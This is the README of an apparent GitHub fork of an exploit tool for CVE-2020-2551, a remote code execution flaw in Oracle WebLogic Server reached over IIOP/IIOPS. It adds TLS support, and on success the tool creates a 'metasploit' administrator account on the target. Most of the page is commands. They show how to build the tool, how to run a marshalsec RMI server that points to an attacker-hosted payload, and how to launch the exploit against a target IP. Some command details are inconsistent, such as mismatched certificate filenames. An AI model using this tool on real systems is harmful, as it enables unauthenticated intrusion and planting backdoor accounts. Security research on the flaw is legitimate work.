CVE-2020-2551: A Java repository from milo2012

CVE-2020-2551

Fork from https://github.com/Y4er/CVE-2020-2551 with some quality of life changes. See below for more details.

Description

A remote code execution vulnerability was found in Oracle Weblogic Server. A remote, unauthenticated attacker could exploit this vulnerability and cause a remote IIOP server to initialize a Java object that invokes a JNDI lookup to a remote, attacker-controlled server. A malicious JNDI lookup will result in code execution.

Changes

The original tool from https://github.com/Y4er/CVE-2020-2551 only support IIOP (7001/tcp). IIOPS (7002/tcp) was not implemented
Support for Weblogic (x.x.x.x:7002 instead of just x.x.x.x:7001)
Support for Weblogic servers that support TLS1.2 only
Detect when IIOP protocol have been disabled on the Weblogic server
Switch to SSL (IIOPS) when TCP port 7002 instead of 7001 (IIOP) has been selected
Add metasploit|metasploit local admin account on Weblogic server on successful exploitation

Prerequisites

Oracle WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 or 12.2.1.4.0 (fmw_12.1.3.0.0_wls.jar) from http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-for-dev-1703574.html
JDK 1.6 (jdk-6u45-linux-x64.bin) from https://www.oracle.com/sg/java/technologies/javase-java-archive-javase6-downloads.html
JDK 1.8 (jdk-8u281-linux-x64.tar.gz) from https://www.oracle.com/sg/java/technologies/javase/javase-jdk8-downloads.html
marshalsec-0.0.3-SNAPSHOT-all.jar from https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true
Ant (apt-install ant)

Steps

Clone and Compile

# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt-install ant
$ cd /tmp
$ wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true -o marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make

Dump and Import SSL Certificate

If you are targeting Weblogic server (x.x.x.x:7002) (iiops), run the below commands. Replace 172.16.164.2 with the correct IP address.
If you are targeting Weblogic server (x.x.x.x:7001) (iiop), skip this step

$ echo -n | openssl s_client -connect 172.16.164.2:7002 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.133.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit

Run each of the commands in different terminal

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099   
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp

milo2012/CVE-2020-2551